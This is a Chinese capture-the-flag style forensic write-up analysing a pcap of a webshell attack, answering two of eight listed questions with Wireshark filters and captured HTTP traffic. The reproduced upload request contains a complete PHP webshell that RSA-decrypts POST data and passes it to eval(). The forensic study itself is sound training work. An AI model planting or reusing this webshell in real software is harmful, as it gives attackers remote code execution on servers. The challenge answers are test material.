webshell流量分析-Practice1

题目描述 :开头的附件是本题使用的pcap文件,根据此文件需要解答以下8个问题。并最终组合成一个MD5形式的flag。

Q1. 黑客的 IP 地址是什么?

Q2. 黑客通过漏洞上传连接服务器的文件名字是什么?

Q3. 黑客上传的 Webshell 用的什么工具连接?

Q4. 黑客利用什么漏洞来进行攻击?

Q5. 黑客连接 Webshell 的连接密码是什么?

Q6. 黑客连接 Webshell 后执行的第一条系统命令是什么?

Q7. 黑客通过 Webshell 上传的文件内容是什么?

Q8. 黑客创建系统的用户名字叫什么?

Q1

思路

网络攻击中,黑客(攻击者)会与服务器保持频繁通信,因此筛选出通信最频繁的IP对话,然后确认哪一方是攻击方。
操作

打开wireshark软件,"Statistics" -> "Conversations" -> 勾选"IPv4",可以看到通信最频繁的是192.168.11.39与192.168.11.93间的对话,在这条记录中192.168.11.39为通信发起方,因此锁定黑客为192.168.11.39

Q2

思路

本小问在考察文件上传漏洞,可通过追踪上传动作本身(multipart/form-data)来找到webshell文件名。黑客通过POST请求提交webshell时数据包的Content-type一般是multipart/form-data,由此可筛选出相关的数据包,然后对数据包进行追踪流以还原黑客与服务器间的对话,从对话中找到上传的webshell名。
操作

Step1。筛选数据包。在wireshark中设置filter的http.request.method为POST、content_type包含"multipart",发现只有一个数据包Frame16651。

bash 复制代码
http.request.method == POST && http.content_type contains "multipart/form-data"

Step2。对得到的这条数据包进行流追踪,我将关键信息放在下面的代码块中,可看到主机192.168.93发起了三轮对话:第一轮对话黑客发起POST请求,提交的表单里上传了一个名为san.php的文件(filename="san.php"),服务器返回HTTP/1.1 200 OK;由于客户端提交给服务器的木马一般会被重命名,于是黑客继续发起第二轮GET请求,服务器返回HTTP/1.1 200 OK并附带一大串HTML代码,在该代码底部写着uploads/1768728211_696ca6939300d_san.php其实就是黑客;拿到了真实路径后,黑客在第三轮对话中直接发起GET请求去访问前面提交的木马,服务器干净利落的返回了HTTP/1.1 200 OK。后续黑客就可以掏出像蚁剑、哥斯拉这样的工具开始远程控制服务器了。因此,上传连接服务器的文件名为1768728211_696ca6939300d_san.php

xml 复制代码
POST /upload.php HTTP/1.1
Host: 192.168.11.93
Content-Length: 882
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.11.93
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
------WebKitFormBoundaryUczYToC2RbAgYvPk
Content-Disposition: form-data; name="file"; filename="san.php"
Content-Type: image/jpeg
<?php
@error_reporting(0);
$data = @$_POST['shell'];
if (isset($data)) {
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCd4MxZ+bp49Fy3KF/kfTUbOgaJ
VQTKVbvAEtA+mdowqmPZUKaE2R6EKgBoFSPdifyTtVDj3WjEezSYFiYOZlYwEYT6
RhzwnmczKI/QKDq1+BUZqKF0FdyoQVJIo/3M5t+uBVswwlQ5l+eBo9fCdXqrI5xJ
xib6Z/MRrAYtbLkykwIDAQAB
-----END PUBLIC KEY-----
EOF;
    $pk_res = openssl_pkey_get_public($pk);
    $chunks = explode("|", $data);
    $payload = '';
    foreach ($chunks as $chunk) {
        $decrypted = '';
        if (openssl_public_decrypt(base64_decode($chunk), $decrypted, $pk_res)) {
            $payload .= $decrypted;
        }
    }
    eval($payload);
}
?>
------WebKitFormBoundaryUczYToC2RbAgYvPk--
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache


GET /admin.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>............ - ..................</title>
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        .admin-header {
            background: linear-gradient(135deg, #2c3e50 0%, #34495e 100%);
            color: white;
            padding: 20px 0;
            margin-bottom: 30px;
        }
        
        .admin-main {
            min-height: 600px;
        }
        
        .admin-stats {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 20px;
            margin-bottom: 30px;
        }
        
        .stat-card {
            background: white;
            padding: 25px;
            border-radius: 12px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            text-align: center;
            transition: transform 0.3s;
        }
        
        .stat-card:hover {
            transform: translateY(-5px);
        }
        
        .stat-icon {
            font-size: 36px;
            margin-bottom: 15px;
            color: #3498db;
        }
        
        .stat-number {
            font-size: 32px;
            font-weight: bold;
            color: #2c3e50;
            margin-bottom: 10px;
        }
        
        .stat-label {
            color: #666;
            font-size: 14px;
        }
        
        .admin-actions {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 20px;
            margin: 30px 0;
        }
        
        .action-card {
            background: white;
            padding: 30px;
            border-radius: 12px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            text-decoration: none;
            color: inherit;
            transition: all 0.3s;
            border-left: 4px solid #3498db;
        }
        
        .action-card:hover {
            transform: translateY(-5px);
            box-shadow: 0 15px 30px rgba(0,0,0,0.1);
            background: #3498db;
            color: white;
        }
        
        .action-card:hover .action-icon {
            color: white;
        }
        
        .action-icon {
            font-size: 32px;
            color: #3498db;
            margin-bottom: 15px;
        }
        
        .action-title {
            font-size: 18px;
            margin-bottom: 10px;
            font-weight: 600;
        }
        
        .action-desc {
            color: #666;
            font-size: 14px;
        }
        
        .action-card:hover .action-desc {
            color: rgba(255,255,255,0.9);
        }
        
        .admin-table-container {
            background: white;
            border-radius: 12px;
            padding: 30px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.05);
            margin-top: 30px;
            overflow-x: auto;
        }
        
        .admin-table {
            width: 100%;
            border-collapse: collapse;
        }
        
        .admin-table th {
            background: #f8f9fa;
            color: #2c3e50;
            font-weight: 600;
            text-align: left;
            padding: 15px;
            border-bottom: 2px solid #e9ecef;
        }
        
        .admin-table td {
            padding: 15px;
            border-bottom: 1px solid #e9ecef;
        }
        
        .admin-table tr:hover {
            background: #f8f9fa;
        }
        
        .file-cell {
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .file-cell i {
            color: #3498db;
        }
    </style>
</head>
<body>
    <header class="admin-header">
        <div class="container">
            <div class="header-top">
                <div class="logo">
                    <i class="fas fa-tachometer-alt"></i>
                    <span>...............</span>
                </div>
                <div class="header-info">
                    <div class="info-item">
                        <i class="fas fa-user-shield"></i>
                        <span>............admin</span>
                    </div>
                    <div class="info-item">
                        <i class="fas fa-sign-out-alt"></i>
                        <span><a href="logout.php" style="color: white; text-decoration: none;">............</a></span>
                    </div>
                </div>
            </div>
            
            <nav class="main-nav">
                <ul>
                    <li class="active"><a href="admin.php"><i class="fas fa-tachometer-alt"></i> .........</a></li>
                    <li><a href="upload.php"><i class="fas fa-cloud-upload-alt"></i> ............</a></li>
                    <li><a href="view.php"><i class="fas fa-folder-open"></i> ............</a></li>
                    <li><a href="#"><i class="fas fa-users"></i> ............</a></li>
                    <li><a href="#"><i class="fas fa-chart-bar"></i> ............</a></li>
                    <li><a href="index.php"><i class="fas fa-home"></i> ............</a></li>
                </ul>
            </nav>
        </div>
    </header>

    <main class="container admin-main">
        <div class="admin-stats">
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-users"></i>
                </div>
                <div class="stat-number">4</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-file-alt"></i>
                </div>
                <div class="stat-number">6</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-cloud-upload-alt"></i>
                </div>
                <div class="stat-number">6</div>
                <div class="stat-label">............</div>
            </div>
            
            <div class="stat-card">
                <div class="stat-icon">
                    <i class="fas fa-hdd"></i>
                </div>
                <div class="stat-number">
                    0                </div>
                <div class="stat-label">............(MB)</div>
            </div>
        </div>
        
        <h2 class="section-title"><i class="fas fa-welcome"></i> ...........................</h2>
        <p style="color: #666; margin-bottom: 30px;">.....................................................................</p>
        
        <div class="admin-actions">
            <a href="upload.php" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-cloud-upload-alt"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="view.php" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-folder-open"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="#" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-users-cog"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">...........................</p>
            </a>
            
            <a href="#" class="action-card">
                <div class="action-icon">
                    <i class="fas fa-chart-line"></i>
                </div>
                <h3 class="action-title">............</h3>
                <p class="action-desc">..............................</p>
            </a>
        </div>
        
        <div class="admin-table-container">
            <h3 class="section-title" style="margin-top: 0;"><i class="fas fa-history"></i> .....................</h3>
            
                        <table class="admin-table">
                <thead>
                    <tr>
                        <th>.........</th>
                        <th>......</th>
                        <th>............</th>
                        <th>......</th>
                    </tr>
                </thead>
                <tbody>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.7 KB</td>
                        <td>2026-01-18 17:23</td>
                        <td>
                            <a href="uploads/1768728211_696ca6939300d_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768728211_696ca6939300d_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.7 KB</td>
                        <td>2026-01-18 15:31</td>
                        <td>
                            <a href="uploads/1768721510_696c8c668ba5e_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768721510_696c8c668ba5e_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-code"></i>
                                <span>san.php</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:18</td>
                        <td>
                            <a href="uploads/1768720729_696c89591a5fc_san.php" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720729_696c89591a5fc_san.php" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-image"></i>
                                <span>san.jpg</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:18</td>
                        <td>
                            <a href="uploads/1768720704_696c8940c0407_san.jpg" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720704_696c8940c0407_san.jpg" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                        <tr>
                        <td>
                            <div class="file-cell">
                                                                <i class="fas fa-file-image"></i>
                                <span>san.jpg</span>
                            </div>
                        </td>
                        <td>0.5 KB</td>
                        <td>2026-01-18 15:08</td>
                        <td>
                            <a href="uploads/1768720109_696c86ed6d272.jpg" 
                               class="btn btn-primary btn-small" 
                               target="_blank">
                                <i class="fas fa-eye"></i> ......
                            </a>
                            <a href="uploads/1768720109_696c86ed6d272.jpg" 
                               class="btn btn-secondary btn-small" 
                               download>
                                <i class="fas fa-download"></i> ......
                            </a>
                        </td>
                    </tr>
                                    </tbody>
            </table>
            
                        <div style="text-align: center; margin-top: 20px;">
                <a href="view.php" class="btn btn-outline">..................</a>
            </div>
                        
                    </div>
    </main>
</body>
</html>


GET /uploads/1768728211_696ca6939300d_san.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
相关推荐
BullSmall2 小时前
从2026年春晚 详细分析未来IT行业的发展
linux·运维·服务器·数据库
林姜泽樾2 小时前
centOS改中文输入法教程
linux·运维·服务器·centos
小杰帅气2 小时前
POSIX信号量
linux·运维·服务器
微风◝2 小时前
网络安全入门系列(1):VMware安装Kali Linux 2025.4
linux·运维·服务器
开开心心_Every2 小时前
音频格式互转工具,支持Mp3ApeWavFlac互转
linux·运维·服务器·typescript·edge·pdf·asp.net
码农编程录2 小时前
【notes13】ioctl,休眠&唤醒,proc文件系统,调用堆栈函数,printk,动态打印,top,dstat,perf,ftrace
linux
红豆子不相思2 小时前
virual serve
linux·运维·服务器
zl_dfq2 小时前
Linux 之 【网络套接字编程】(网络字节序、字节序转换函数、套接字编程类型、标准套接字编程的头文件、sockaddr结构、整数IP与字符串IP的转换)
linux·网络
不知名。。。。。。。。2 小时前
Linux---序列化
linux